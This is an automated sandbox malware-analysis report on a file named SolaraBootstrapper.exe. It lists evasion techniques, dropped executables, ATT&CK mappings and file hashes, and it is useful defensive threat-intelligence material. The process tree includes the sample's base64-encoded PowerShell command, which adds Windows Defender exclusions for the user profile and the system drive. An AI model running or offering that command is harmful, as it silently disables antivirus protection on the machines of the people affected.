hxxps://github[.]com/Thdd993/Solara/blob/main/SolaraBootstrapper[.]exe

Analysis

max time kernel
40s
max time network
41s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
12/07/2024, 16:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Thdd993/Solara/blob/main/SolaraBootstrapper.exe

Score

9^/10

evasion execution themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe

Executes dropped EXE 5 IoCs

pid	Process
3108	SolaraBootstrapper.exe
4104	SolaraBootstrapper.exe
4624	Solara.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5684	Solara.exe

Loads dropped DLL 5 IoCs

pid	Process
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000700000002358f-722.dat	themida
behavioral1/memory/5600-730-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral1/memory/5600-755-0x0000000180000000-0x0000000180B57000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
55	raw.githubusercontent.com
62	raw.githubusercontent.com
64	raw.githubusercontent.com
42	raw.githubusercontent.com
43	raw.githubusercontent.com
54	raw.githubusercontent.com

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1208	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
400	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 940697.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

pid	Process
456	msedge.exe
456	msedge.exe
3472	msedge.exe
3472	msedge.exe
2316	identity_helper.exe
2316	identity_helper.exe
1716	msedge.exe
1716	msedge.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4104	SolaraBootstrapper.exe
4104	SolaraBootstrapper.exe
4624	Solara.exe
4624	Solara.exe
4104	SolaraBootstrapper.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
4624	Solara.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
5684	Solara.exe
5684	Solara.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4624	Solara.exe
Token: SeDebugPrivilege	4104	SolaraBootstrapper.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	5684	Solara.exe
Token: SeDebugPrivilege	5600	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3108	SolaraBootstrapper.exe
5684	Solara.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3472 wrote to memory of 3680	3472	msedge.exe	82
PID 3472 wrote to memory of 3680	3472	msedge.exe	82
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 3124	3472	msedge.exe	83
PID 3472 wrote to memory of 456	3472	msedge.exe	84
PID 3472 wrote to memory of 456	3472	msedge.exe	84
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85
PID 3472 wrote to memory of 1256	3472	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Thdd993/Solara/blob/main/SolaraBootstrapper.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb750e46f8,0x7ffb750e4708,0x7ffb750e4718
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
  2⤵
  PID:1256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:2296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5556 /prefetch:8
  2⤵
  PID:3424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:1400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5992 /prefetch:8
  2⤵
  PID:4148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6012 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1716
- C:\Users\Admin\Downloads\SolaraBootstrapper.exe
  "C:\Users\Admin\Downloads\SolaraBootstrapper.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3108
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAcwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAYQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAaQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdQB1ACMAPgA="
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1208
- - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
  - - C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5600
- - C:\Users\Admin\AppData\Local\Temp\Solara.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDE5A.tmp.bat""
      4⤵
      PID:2972
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:400
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\test1\Solara.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\test1\Solara.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
  2⤵
  PID:5800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,17100859965041924409,15428677279391968888,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:5844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2016

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:5584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara.exe.log

Filesize
425B

MD5
fff5cbccb6b31b40f834b8f4778a779a

SHA1
899ed0377e89f1ed434cfeecc5bc0163ebdf0454

SHA256
b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

SHA512
1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
584971c8ba88c824fd51a05dddb45a98

SHA1
b7c9489b4427652a9cdd754d1c1b6ac4034be421

SHA256
e2d8de6c2323bbb3863ec50843d9b58a22e911fd626d31430658b9ea942cd307

SHA512
5dbf1a4631a04d1149d8fab2b8e0e43ccd97b7212de43b961b9128a8bf03329164fdeb480154a8ffea5835f28417a7d2b115b8bf8d578d00b13c3682aa5ca726

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b28ef7d9f6d74f055cc49876767c886c

SHA1
d6b3267f36c340979f8fc3e012fdd02c468740bf

SHA256
fa6804456884789f4bdf9c3f5a4a8f29e0ededde149c4384072f3d8cc85bcc37

SHA512
491f893c8f765e5d629bce8dd5067cef4e2ebc558d43bfb05e358bca43e1a66ee1285519bc266fd0ff5b5e09769a56077b62ac55fa8797c1edf6205843356e75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
72d2ad99cc3ead6d4164c0e1e0f3d93b

SHA1
9904d4c24c94a7410cdfbf149d2e1802db696a32

SHA256
e963cddfab0f9abb0cc7f4f7986c5be6643b8bf49d1c8606d217c9ccf4e7431f

SHA512
35dfa404162371fafe4d0580273274e6ca354b462ac893f56cb9cfe3f172585b3e53a9555f14fd04c07f04132234f7711b7ab02ca571e478e2c3cb87a884111b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ce91ef9e406339c29f2c091f8b2d02a6

SHA1
c6ab710fa2977d4ce1461d3331e960b9fd025ab3

SHA256
1b0f75cbbb7787692cc7656e8c1d69083e81e415d2b64f332813a50c741ab2c9

SHA512
36a6d37fb0c13868805c422bd0fde7c648b536aae327875e6e2482c900cc496c80996a3d2565f65dc28eaae8f6c1ef86020c0568486a94e9eb676d2380eae499

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
73b48f4b689f2d4d7bea8bdd2edcaaac

SHA1
94fb157da3f7d87899a50270f27c43191812cf86

SHA256
0dccf450bc8a6afbde631371eef7baa864c27d916effae94bc313b03ad27016f

SHA512
b6c9e149452aa73423da021947ed4b8b1b3f49ab574499bed6031f704019de81f5fda7ae162432b78468dd43d35086848adb271e3a8ff541e5470fae189b2351

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
326d7f10eb655ddf04506857b1e711fc

SHA1
193d3662f0d5f01c0470ea2c2c866398dd94b30c

SHA256
fcfddfb9589ef251401ba5831286d8a505efc5a60568882541f3f1d0e08427ef

SHA512
f76fd3c0281c79c93805d5d9f3051b5ff0f7c1db3fcde5a14c84d4b810a13b87473bfba0a262c35c7944921cead46bb1bb00c8ce7726a80b096775602dbbe0d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
63c3707dedb3a25b203e8874dbe52dbb

SHA1
b7ac97de153a5a9c5331961f65b0b3c5d7e522eb

SHA256
90e4de4cd021773eee4fee64400c59a2f5a21c15708c4cd94f36f13a91910253

SHA512
aa7126dc55c25d93a734195b54aa01a46df738c4c5d4014bd33a72bd5407c341fc0c7c49336db7c4f0c3f9cc334dc6dc3e3948846b15ef895606957494ba8665

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe581661.TMP

Filesize
1KB

MD5
a09d8b4cf24767f4779a8ca88191951c

SHA1
699cc7eddd19c4148cb5beaafcd5eb45d74fe216

SHA256
483201f81bc0f7cba1177f4c5eb1486a07119055cc5848478b8b7fdda5b93ed7

SHA512
09051ea10115d0647accdfbd7c2c3754939f0af29dd61b860ad10416bc474698bae9a69b146dddb40eb35086c487ebaf5220bbfb2372e60f0ae855f71f5bc3e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9996a2c253a9a0fc78534e7d168327b8

SHA1
75285afff4fe403b9f82466bde90439101719257

SHA256
ff99cc79f2711bb30ed83f69393a51a84e1fa51bfb0eda14f590cd7798b35ce0

SHA512
4740f8d301883158c1b219d59753b4c211dffe65691987e0f3a404640e371da36f76862a2870c71401fbb0265d17b2255a5efd99aac8e385cb41b3a3d9676e25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d0e9cfbd0d4e2e3cf8838523ef1c5bd0

SHA1
7b8f1684f6648e97d037ed5f865d747608cb68de

SHA256
fd5af4a5c5bc45100d5f7819d5f296d6d265b4035c639ee1ca21a390f0a9e3b5

SHA512
dece8afc6cbf935335bc51a2e70f4fb3be8a13abb7bb74fd7ca8102a324b23766606c9a8679d6d9df305429d0f15c2d512a03eb449709a14f98ae385edf7ebc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Core.dll

Filesize
488KB

MD5
851fee9a41856b588847cf8272645f58

SHA1
